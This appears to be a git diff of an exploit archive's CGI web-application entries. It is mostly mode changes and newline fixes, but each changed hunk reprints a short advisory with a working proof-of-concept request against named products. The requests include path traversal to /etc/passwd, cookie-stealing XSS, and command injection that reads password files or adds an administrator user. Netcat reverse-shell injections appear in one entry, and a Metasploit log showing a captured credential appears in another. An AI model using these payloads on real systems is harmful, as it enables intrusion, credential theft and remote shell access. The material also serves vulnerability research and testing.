b/platforms/cgi/webapps/31025.txt @@ -4,4 +4,4 @@ Garment Center is prone to a local file-include vulnerability because it fails t Exploiting this issue may allow an unauthorized user to view files and execute local scripts. -http://www.example.com/index.cgi?page=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.cgi?page=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/31043.txt b/platforms/cgi/webapps/31043.txt old mode 100755 new mode 100644 index af4d0d92b..731945182 --- a/platforms/cgi/webapps/31043.txt +++ b/platforms/cgi/webapps/31043.txt @@ -4,4 +4,4 @@ Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnera An attacker can exploit this issue to alter administrative configuration on affected devices. Specifically, altering the wireless encryption settings on devices has been demonstrated. Other attacks may also be possible. -http://www.example.com/cp06_wifi_m_nocifr.cgi?wlChannel=Auto&wlRadioEnable=on \ No newline at end of file +http://www.example.com/cp06_wifi_m_nocifr.cgi?wlChannel=Auto&wlRadioEnable=on \ No newline at end of file diff --git a/platforms/cgi/webapps/31071.txt b/platforms/cgi/webapps/31071.txt old mode 100755 new mode 100644 index 466dfbb23..54d540f2c --- a/platforms/cgi/webapps/31071.txt +++ b/platforms/cgi/webapps/31071.txt @@ -4,4 +4,4 @@ VB Marketing is prone to a local file-include vulnerability because it fails to An attacker can exploit this vulnerability using directory-traversal strings to include local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. -http://www.example.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00 \ No newline at end of file +http://www.example.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/31081.txt b/platforms/cgi/webapps/31081.txt old mode 100755 new mode 100644 index bcdfc5242..1755d3d57 --- a/platforms/cgi/webapps/31081.txt +++ b/platforms/cgi/webapps/31081.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow bgplg shipped with OpenBSD 4.1 is vulnerable; other versions may also be affected. -http://www.example.com/cgi-bin/bgplg?cmd=show+version<script>alert("OpenBSD%20XSS)</script> \ No newline at end of file +http://www.example.com/cgi-bin/bgplg?cmd=show+version<script>alert("OpenBSD%20XSS)</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/31313.txt b/platforms/cgi/webapps/31313.txt old mode 100755 new mode 100644 index 901ea9292..ce549511d --- a/platforms/cgi/webapps/31313.txt +++ b/platforms/cgi/webapps/31313.txt @@ -7,4 +7,4 @@ Exploiting this issue can allow an attacker to access sensitive data that may be Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected. https://www.example.com/dana-na/auth/remediate.cgi?action=&step=preauth -https://www.example.com/dana-na/auth/remediate.cgi?step=preauth \ No newline at end of file +https://www.example.com/dana-na/auth/remediate.cgi?step=preauth \ No newline at end of file diff --git a/platforms/cgi/webapps/31411.txt b/platforms/cgi/webapps/31411.txt old mode 100755 new mode 100644 index f074b2714..d828a875e --- a/platforms/cgi/webapps/31411.txt +++ b/platforms/cgi/webapps/31411.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow RSA WebID 5.3 is vulnerable; other versions may also be affected. -https://www.example.com/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&authntype=2&username=a&passcode=a&postdata=aaa"%20><SCRIPT>alert(document.cookie)</script><!-- \ No newline at end of file +https://www.example.com/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&authntype=2&username=a&passcode=a&postdata=aaa"%20><SCRIPT>alert(document.cookie)</script><!-- \ No newline at end of file diff --git a/platforms/cgi/webapps/31466.txt b/platforms/cgi/webapps/31466.txt old mode 100755 new mode 100644 index 66c32ceed..43e583402 --- a/platforms/cgi/webapps/31466.txt +++ b/platforms/cgi/webapps/31466.txt @@ -8,4 +8,4 @@ These issues affect Webutil 2.3 and 2.7. http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd -http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd \ No newline at end of file +http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/31537.txt b/platforms/cgi/webapps/31537.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/31538.txt b/platforms/cgi/webapps/31538.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/31754.txt b/platforms/cgi/webapps/31754.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/31755.txt b/platforms/cgi/webapps/31755.txt old mode 100755 new mode 100644 index 85e278221..f9b29c3f4 --- a/platforms/cgi/webapps/31755.txt +++ b/platforms/cgi/webapps/31755.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect ITS 6200.1017.50954.0, Build 730827 (win32/IIS 5.0). -http://www.example.com/scripts/wgate/%22);alert('xss');alert(%22a/! \ No newline at end of file +http://www.example.com/scripts/wgate/%22);alert('xss');alert(%22a/! \ No newline at end of file diff --git a/platforms/cgi/webapps/31892.txt b/platforms/cgi/webapps/31892.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/32258.txt b/platforms/cgi/webapps/32258.txt old mode 100755 new mode 100644 index 57b84711f..ca80c7e3e --- a/platforms/cgi/webapps/32258.txt +++ b/platforms/cgi/webapps/32258.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AWStats 6.8 is vulnerable; other versions may also be affected. -http://www.example.com/awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)// \ No newline at end of file +http://www.example.com/awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)// \ No newline at end of file diff --git a/platforms/cgi/webapps/32430.txt b/platforms/cgi/webapps/32430.txt old mode 100755 new mode 100644 index 4e01b033d..4111724fc --- a/platforms/cgi/webapps/32430.txt +++ b/platforms/cgi/webapps/32430.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WhoDomLite 1.1.3 is vulnerable; other versions may also be affected. -http://www.example.com/wholite.cgi?dom= xss_code &tld=com&action=search \ No newline at end of file +http://www.example.com/wholite.cgi?dom= xss_code &tld=com&action=search \ No newline at end of file diff --git a/platforms/cgi/webapps/32734.txt b/platforms/cgi/webapps/32734.txt old mode 100755 new mode 100644 index d1358da16..f88e4af80 --- a/platforms/cgi/webapps/32734.txt +++ b/platforms/cgi/webapps/32734.txt @@ -8,4 +8,4 @@ The attacker may leverage the cross-site scripting issue to execute arbitrary sc Versions prior to LemonLDAP::NG 0.9.3.2 are vulnerable. -http://www.example.com/index.pl?url=";><script>alert("You were hacked!")</script><br" \ No newline at end of file +http://www.example.com/index.pl?url=";><script>alert("You were hacked!")</script><br" \ No newline at end of file diff --git a/platforms/cgi/webapps/32746.txt b/platforms/cgi/webapps/32746.txt old mode 100755 new mode 100644 index b51dc4532..b8a1a2b3e --- a/platforms/cgi/webapps/32746.txt +++ b/platforms/cgi/webapps/32746.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to MoinMoin 1.8.1 are vulnerable. -http://www.example.com/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script> \ No newline at end of file +http://www.example.com/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/32870.txt b/platforms/cgi/webapps/32870.txt old mode 100755 new mode 100644 index a89cf7145..eb1017e47 --- a/platforms/cgi/webapps/32870.txt +++ b/platforms/cgi/webapps/32870.txt @@ -9,4 +9,4 @@ The following are vulnerable: AWStats 6.5 (build 1.857) and prior WebGUI Runtime Environment 0.8.x and prior -http://www.example.com/awstats/awstats.pl?config=HACKdestailleur.fr \ No newline at end of file +http://www.example.com/awstats/awstats.pl?config=HACKdestailleur.fr \ No newline at end of file diff --git a/platforms/cgi/webapps/32907.txt b/platforms/cgi/webapps/32907.txt old mode 100755 new mode 100644 index 5e3b0660f..dd5b8214f --- a/platforms/cgi/webapps/32907.txt +++ b/platforms/cgi/webapps/32907.txt @@ -8,4 +8,4 @@ DAAP Extension for Banshee 1.4.2 is vulnerable; other versions may also be affec The following example URI is available: -http://www.example.com:8089/[xss-here] \ No newline at end of file +http://www.example.com:8089/[xss-here] \ No newline at end of file diff --git a/platforms/cgi/webapps/33231.txt b/platforms/cgi/webapps/33231.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/33334.txt b/platforms/cgi/webapps/33334.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/33494.txt b/platforms/cgi/webapps/33494.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/33887.txt b/platforms/cgi/webapps/33887.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/33958.txt b/platforms/cgi/webapps/33958.txt old mode 100755 new mode 100644 index 7d937473c..a4cd8b303 --- a/platforms/cgi/webapps/33958.txt +++ b/platforms/cgi/webapps/33958.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Publique! 2.3 is vulnerable; other versions may also be affected. -http://www.example.com/publique/cgi/cgilua.exe/sys/start.htm?sid=1 \ No newline at end of file +http://www.example.com/publique/cgi/cgilua.exe/sys/start.htm?sid=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/34080.txt b/platforms/cgi/webapps/34080.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/34103.txt b/platforms/cgi/webapps/34103.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/3412.txt b/platforms/cgi/webapps/3412.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/34223.txt b/platforms/cgi/webapps/34223.txt old mode 100755 new mode 100644 index f32317e87..73e94acb4 --- a/platforms/cgi/webapps/34223.txt +++ b/platforms/cgi/webapps/34223.txt @@ -6,4 +6,4 @@ Successful attacks can compromise the affected application and possibly the unde Miyabi CGI Tools 1.02 is vulnerable; other versions may also be affected. -http://www.example.com/index.pl?mode=html&fn=|uname%20-a| \ No newline at end of file +http://www.example.com/index.pl?mode=html&fn=|uname%20-a| \ No newline at end of file diff --git a/platforms/cgi/webapps/34347.txt b/platforms/cgi/webapps/34347.txt old mode 100755 new mode 100644 index 9293c3e38..e1d35d535 --- a/platforms/cgi/webapps/34347.txt +++ b/platforms/cgi/webapps/34347.txt @@ -6,4 +6,4 @@ Successful attacks can compromise the affected software and the underlying serve iOffice 0.1 is affected; other versions may also be vulnerable. -http://www.example.com/cgi-bin/index.pl?section_name=whatever&section=ioffice&parametre=|id| \ No newline at end of file +http://www.example.com/cgi-bin/index.pl?section_name=whatever&section=ioffice&parametre=|id| \ No newline at end of file diff --git a/platforms/cgi/webapps/34420.txt b/platforms/cgi/webapps/34420.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/34794.txt b/platforms/cgi/webapps/34794.txt old mode 100755 new mode 100644 index 44382b83e..82e33dbe4 --- a/platforms/cgi/webapps/34794.txt +++ b/platforms/cgi/webapps/34794.txt @@ -8,4 +8,4 @@ Netbiter webSCADA WS100 and Netbiter webSCADA WS200 are vulnerable; other versio http://www.example.com/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00 http://www.example.com/gi-bin/read.cgi?file=/home/config/users.cfg -http://www.example.com/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf&section=PAGE2 \ No newline at end of file +http://www.example.com/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf&section=PAGE2 \ No newline at end of file diff --git a/platforms/cgi/webapps/34918.txt b/platforms/cgi/webapps/34918.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/34994.txt b/platforms/cgi/webapps/34994.txt old mode 100755 new mode 100644 index f997ee551..901dfc672 --- a/platforms/cgi/webapps/34994.txt +++ b/platforms/cgi/webapps/34994.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/cgi-bin/luci/;stok=d/admin/network/network/"/><script>alert(1);</script> -http://www.example.com/cgi-bin/luci/;stok=d/admin/system/packages?query=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&submit=OK \ No newline at end of file +http://www.example.com/cgi-bin/luci/;stok=d/admin/system/packages?query=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&submit=OK \ No newline at end of file diff --git a/platforms/cgi/webapps/35008.txt b/platforms/cgi/webapps/35008.txt old mode 100755 new mode 100644 index 6d04b39d3..860e8cf51 --- a/platforms/cgi/webapps/35008.txt +++ b/platforms/cgi/webapps/35008.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Hot Links SQL 3.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/report.cgi?id=999; or 'a'='a \ No newline at end of file +http://www.example.com/report.cgi?id=999; or 'a'='a \ No newline at end of file diff --git a/platforms/cgi/webapps/35015.txt b/platforms/cgi/webapps/35015.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/35035.txt b/platforms/cgi/webapps/35035.txt old mode 100755 new mode 100644 index e243b9bb0..0606ad9c2 --- a/platforms/cgi/webapps/35035.txt +++ b/platforms/cgi/webapps/35035.txt @@ -10,4 +10,4 @@ Attacking Windows XP Apache Tomcat AWStats Server: http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav Attacking Windows 2003 or Windows XP AWStats Server: -http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share \ No newline at end of file +http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share \ No newline at end of file diff --git a/platforms/cgi/webapps/35085.txt b/platforms/cgi/webapps/35085.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/35093.txt b/platforms/cgi/webapps/35093.txt old mode 100755 new mode 100644 index 707ae84ef..ff4ae1ac1 --- a/platforms/cgi/webapps/35093.txt +++ b/platforms/cgi/webapps/35093.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow BizDir v.05.10 is vulnerable; other versions may also be affected. -http://www.example.com/cgi-bin/bizdir/bizdir.cgi?f_mode=srch& f_srch=<XSS inj>&f_srch_mode=SOME&f_start_at=1 \ No newline at end of file +http://www.example.com/cgi-bin/bizdir/bizdir.cgi?f_mode=srch& f_srch=<XSS inj>&f_srch_mode=SOME&f_start_at=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/35357.txt b/platforms/cgi/webapps/35357.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/35438.txt b/platforms/cgi/webapps/35438.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/35463.txt b/platforms/cgi/webapps/35463.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/35676.txt b/platforms/cgi/webapps/35676.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/35698.txt b/platforms/cgi/webapps/35698.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/35802.txt b/platforms/cgi/webapps/35802.txt old mode 100755 new mode 100644 index c42254d84..3de946be0 --- a/platforms/cgi/webapps/35802.txt +++ b/platforms/cgi/webapps/35802.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Blackboard Learn 8.0 is vulnerable; other versions may also be affected. -http://www.example.com/bin/common/search.pl?action=RESULTS&amp;context=USERDIR&amp;type=SEARCH&amp;operation=VIEW&amp;keyword=abcd&amp;keywordraw=%22abcd%22/%3E%3Cscript+src%3Dhttp://www.example2.com/js/alert.js%3E%3C/script%3E%3Ca+href%3D%22test%22%3Ewhat%3C/a&amp;x=26&amp;y=15&amp;by=user_id \ No newline at end of file +http://www.example.com/bin/common/search.pl?action=RESULTS&amp;context=USERDIR&amp;type=SEARCH&amp;operation=VIEW&amp;keyword=abcd&amp;keywordraw=%22abcd%22/%3E%3Cscript+src%3Dhttp://www.example2.com/js/alert.js%3E%3C/script%3E%3Ca+href%3D%22test%22%3Ewhat%3C/a&amp;x=26&amp;y=15&amp;by=user_id \ No newline at end of file diff --git a/platforms/cgi/webapps/35900.txt b/platforms/cgi/webapps/35900.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/36057.txt b/platforms/cgi/webapps/36057.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/36457.txt b/platforms/cgi/webapps/36457.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/36458.txt b/platforms/cgi/webapps/36458.txt old mode 100755 new mode 100644 index 6e89a44b4..35259b0d7 --- a/platforms/cgi/webapps/36458.txt +++ b/platforms/cgi/webapps/36458.txt @@ -4,4 +4,4 @@ Websense Triton is prone to a remote command-execution vulnerability. An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. -https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah| \ No newline at end of file +https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah| \ No newline at end of file diff --git a/platforms/cgi/webapps/36459.txt b/platforms/cgi/webapps/36459.txt old mode 100755 new mode 100644 index 1df906fc2..ca2a6af6b --- a/platforms/cgi/webapps/36459.txt +++ b/platforms/cgi/webapps/36459.txt @@ -11,4 +11,4 @@ Websense Web Security Gateway 7.6 Websense Web Security 7.6 Websense Web Filter 7.6 -https://www.example.com/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def \ No newline at end of file +https://www.example.com/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def \ No newline at end of file diff --git a/platforms/cgi/webapps/36772.txt b/platforms/cgi/webapps/36772.txt old mode 100755 new mode 100644 index 71045e21e..3f15c380b --- a/platforms/cgi/webapps/36772.txt +++ b/platforms/cgi/webapps/36772.txt @@ -4,4 +4,4 @@ EditWrxLite CMS is prone to a remote command-execution vulnerability. Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. -http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a| \ No newline at end of file +http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a| \ No newline at end of file diff --git a/platforms/cgi/webapps/36940.txt b/platforms/cgi/webapps/36940.txt old mode 100755 new mode 100644 index 1e380549f..73cf71833 --- a/platforms/cgi/webapps/36940.txt +++ b/platforms/cgi/webapps/36940.txt @@ -61,4 +61,4 @@ msf auxiliary(http_basic) > [*] Local IP: http://www.malicious-host.tld:80/ [*] Server started. [*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld -[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password" \ No newline at end of file +[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password" \ No newline at end of file diff --git a/platforms/cgi/webapps/36974.txt b/platforms/cgi/webapps/36974.txt old mode 100755 new mode 100644 index 952517405..6a0caa6a6 --- a/platforms/cgi/webapps/36974.txt +++ b/platforms/cgi/webapps/36974.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary commands in the context of WebGlimpse versions prior to 20.20.0 are affected. -query=%27%26command+and+arguments+go+here%26%27 \ No newline at end of file +query=%27%26command+and+arguments+go+here%26%27 \ No newline at end of file diff --git a/platforms/cgi/webapps/36976.txt b/platforms/cgi/webapps/36976.txt old mode 100755 new mode 100644 index 328a507b9..7bfc8f5d5 --- a/platforms/cgi/webapps/36976.txt +++ b/platforms/cgi/webapps/36976.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to access sensitive data that may be WebGlimpse 2.18.7 is vulnerable; other versions may also be affected. -http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=1 \ No newline at end of file +http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/36994.txt b/platforms/cgi/webapps/36994.txt old mode 100755 new mode 100644 index b18c882b3..caf33f977 --- a/platforms/cgi/webapps/36994.txt +++ b/platforms/cgi/webapps/36994.txt @@ -8,4 +8,4 @@ Exploiting this issue may allow an attacker to obtain sensitive information that WebGlimpse 2.18.7 is vulnerable; other versions may also be affected. -http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd \ No newline at end of file +http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/37084.txt b/platforms/cgi/webapps/37084.txt old mode 100755 new mode 100644 index 4e84b56ea..9d532ae65 --- a/platforms/cgi/webapps/37084.txt +++ b/platforms/cgi/webapps/37084.txt @@ -4,4 +4,4 @@ Munin is prone to a remote command-injection vulnerability. Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. -printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80 \ No newline at end of file +printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80 \ No newline at end of file diff --git a/platforms/cgi/webapps/37549.txt b/platforms/cgi/webapps/37549.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/37638.txt b/platforms/cgi/webapps/37638.txt old mode 100755 new mode 100644 index 603219f31..d2f3f3b23 --- a/platforms/cgi/webapps/37638.txt +++ b/platforms/cgi/webapps/37638.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow LISTSERV 16 is vulnerable; other versions may also be affected. -http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/37806.txt b/platforms/cgi/webapps/37806.txt old mode 100755 new mode 100644 index 9789e7d35..a8b80494a --- a/platforms/cgi/webapps/37806.txt +++ b/platforms/cgi/webapps/37806.txt @@ -14,4 +14,4 @@ https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector= https://www.example.com/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C -https://www.example.com/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+ \ No newline at end of file +https://www.example.com/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+ \ No newline at end of file diff --git a/platforms/cgi/webapps/37830.txt b/platforms/cgi/webapps/37830.txt old mode 100755 new mode 100644 index 80ad0caf4..6418980d1 --- a/platforms/cgi/webapps/37830.txt +++ b/platforms/cgi/webapps/37830.txt @@ -14,4 +14,4 @@ http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/b http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up! http://www.example.com/config/global.conf -http://www.example.com/backup/ \ No newline at end of file +http://www.example.com/backup/ \ No newline at end of file diff --git a/platforms/cgi/webapps/38114.html b/platforms/cgi/webapps/38114.html old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/38128.txt b/platforms/cgi/webapps/38128.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/38316.txt b/platforms/cgi/webapps/38316.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/38550.txt b/platforms/cgi/webapps/38550.txt old mode 100755 new mode 100644 index 7be31360a..73958939f --- a/platforms/cgi/webapps/38550.txt +++ b/platforms/cgi/webapps/38550.txt @@ -9,4 +9,4 @@ The following are vulnerable: QNAP VioStor NVR running firmware 4.0.3. QNAP NAS -http://www.example.com/cgi-bin/pingping.cgi?ping_ip=1;whoami \ No newline at end of file +http://www.example.com/cgi-bin/pingping.cgi?ping_ip=1;whoami \ No newline at end of file diff --git a/platforms/cgi/webapps/38593.txt b/platforms/cgi/webapps/38593.txt old mode 100755 new mode 100644 index f01e58f09..e499792c8 --- a/platforms/cgi/webapps/38593.txt +++ b/platforms/cgi/webapps/38593.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in FtpLocate 2.02 is vulnerable; other versions may also be affected. -http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script> \ No newline at end of file +http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/38691.txt b/platforms/cgi/webapps/38691.txt old mode 100755 new mode 100644 index 757987b39..073912140 --- a/platforms/cgi/webapps/38691.txt +++ b/platforms/cgi/webapps/38691.txt @@ -10,4 +10,4 @@ http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareType=49[Inje http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareStatus=0[Inject Payload Here] -http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareLocation=0[Inject Payload Here] \ No newline at end of file +http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareLocation=0[Inject Payload Here] \ No newline at end of file diff --git a/platforms/cgi/webapps/38776.txt b/platforms/cgi/webapps/38776.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/38806.txt b/platforms/cgi/webapps/38806.txt old mode 100755 new mode 100644 index 44d377a58..e389ae38f --- a/platforms/cgi/webapps/38806.txt +++ b/platforms/cgi/webapps/38806.txt @@ -8,4 +8,4 @@ Bugzilla versions 2.17.1 through 4.0.10, 4.1.1 through 4.2.6 and 4.3.1 through 4 http://www.example.com/bugzilla/editflagtypes.cgi?action=insert&can_fully_edit=1&id="><script>alert(1)</script>&token=&target_type=bug&check_clusions=1&name=test1&description=test2&product=TestProduct&component=TestComponent&categoryAction-include=Include&sortkey=1&is_active=on&is_requestable=on&cc_list=&is_requesteeble=on&is_multiplicable=on&grant_group=&request_group= -http://www.example.com/bugzilla/editflagtypes.cgi?action=insert&can_fully_edit=1&id=&token=&target_type=bug&check_clusions=1&name=test&description=test2&product=TestProduct&component=TestComponent&categoryAction-include=Include&sortkey=1"><script>alert(2)</script>&is_active=on&is_requestable=on&cc_list=&is_requesteeble=on&is_multiplicable=on&grant_group=&request_group= \ No newline at end of file +http://www.example.com/bugzilla/editflagtypes.cgi?action=insert&can_fully_edit=1&id=&token=&target_type=bug&check_clusions=1&name=test&description=test2&product=TestProduct&component=TestComponent&categoryAction-include=Include&sortkey=1"><script>alert(2)</script>&is_active=on&is_requestable=on&cc_list=&is_requesteeble=on&is_multiplicable=on&grant_group=&request_group= \ No newline at end of file diff --git a/platforms/cgi/webapps/38807.txt b/platforms/cgi/webapps/38807.txt old mode 100755 new mode 100644 index d9aa46dff..a45d3a8e5 --- a/platforms/cgi/webapps/38807.txt +++ b/platforms/cgi/webapps/38807.txt @@ -8,4 +8,4 @@ Bugzilla versions 4.1.1 through 4.2.6, and 4.3.1 through 4.4 are vulnerable. Note: This issue exists due to an incomplete fix for CVE-2012-4189 (identified in BID 56504 - Bugzilla Multiple Cross Site Scripting and Information Disclosure Vulnerabilities). -https://www.example.com/bugzilla-tip/report.cgi?x_axis_field=short_desc&y_axis_field=short_desc&z_axis_field=short_desc&no_redirect=1&query_format=report-table&short_desc_type=allwordssubstr&short_desc=&resolution=---&longdesc_type=allwordssubstr&longdesc=&bug_file_loc_type=allwordssubstr&bug_file_loc=&status_whiteboard_type=allwordssubstr&status_whiteboard=&keywords_type=allwords&keywords=&deadlinefrom=&deadlineto=&bug_id=22386%2C22387&bug_id_type=anyexact&emailassigned_to1=1&emailtype1=substring&email1=&emailassigned_to2=1&emailreporter2=1&emailqa_contact2=1&emailcc2=1&emailtype2=substring&email2=&emaillongdesc3=1&emailtype3=substring&email3=&chfieldvalue=&chfieldfrom=&chfieldto=Now&j_top=AND&f1=noop&o1=noop&v1=&format=table&action=wrap \ No newline at end of file 